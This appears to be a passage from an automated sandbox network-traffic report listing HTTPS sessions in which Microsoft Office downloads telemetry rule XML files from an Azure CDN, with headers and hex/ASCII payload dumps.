                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093901Z-1746fd949bdw2rg8hC1EWR11u400000002r0000000007v8q
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:01 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              113192.168.2.64985513.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:02 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:02 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:02 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1403
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                              ETag: "0x8DC582BDCDD6400"
                                                                                                              x-ms-request-id: daf0ea0f-401e-005b-1ad4-459c0c000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093902Z-1746fd949bdhk6hphC1EWRaw3c00000002c0000000001794
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:02 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              114192.168.2.64985813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:03 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:03 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:03 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1399
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                              ETag: "0x8DC582BE8C605FF"
                                                                                                              x-ms-request-id: 4885a0d8-201e-0096-65c7-45ace6000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093903Z-1746fd949bddgsvjhC1EWRum2c00000002rg000000006p59
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:03 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              115192.168.2.64985713.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:03 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:03 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:03 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1362
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                              ETag: "0x8DC582BDF497570"
                                                                                                              x-ms-request-id: b15ffdf0-e01e-0051-2acd-4584b2000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093903Z-1746fd949bdlnsqphC1EWRurw000000002dg000000002kz3
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:03 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              116192.168.2.64985613.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:03 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:03 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:03 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1366
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                              ETag: "0x8DC582BDF1E2608"
                                                                                                              x-ms-request-id: 77d68196-001e-0066-56cc-45561e000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093903Z-1746fd949bd54zxghC1EWRzre400000002x00000000001yn
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:03 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              117192.168.2.64985913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:03 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:03 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:03 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1403
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                              ETag: "0x8DC582BDC2EEE03"
                                                                                                              x-ms-request-id: 2b2762fb-b01e-0070-1798-461cc0000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093903Z-1746fd949bd6ztf6hC1EWRvq2s00000002800000000014uf
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:03 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              118192.168.2.64986013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:04 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:05 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:04 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1366
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                              ETag: "0x8DC582BEA414B16"
                                                                                                              x-ms-request-id: 46703850-c01e-002b-03cc-456e00000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093904Z-1746fd949bdfg4slhC1EWR34t000000002d0000000003gdy
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:05 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              119192.168.2.64986113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:05 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:05 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:05 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1399
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                              ETag: "0x8DC582BE1CC18CD"
                                                                                                              x-ms-request-id: a6a36225-101e-000b-71ce-455e5c000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093905Z-1746fd949bdjrnwqhC1EWRpg2800000002qg000000000622
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:05 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              120192.168.2.64986213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:05 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:05 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:05 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1362
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                              ETag: "0x8DC582BEB256F43"
                                                                                                              x-ms-request-id: b50e8154-301e-0052-6684-4665d6000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093905Z-1746fd949bdl6zq5hC1EWRf3ws000000028g000000001uuz
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:05 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              121192.168.2.64986313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:05 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:05 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:05 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1403
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                              ETag: "0x8DC582BEB866CDB"
                                                                                                              x-ms-request-id: 77ea0a00-001e-0066-6ed3-45561e000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093905Z-1746fd949bd9x4mhhC1EWRb76n00000002g0000000006z9r
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:05 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              122192.168.2.64986413.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:05 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:05 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:05 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1366
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                              ETag: "0x8DC582BE5B7B174"
                                                                                                              x-ms-request-id: 52797c88-801e-00ac-33cb-45fd65000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093905Z-1746fd949bdqpttnhC1EWRe1wg0000000260000000007xrr
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
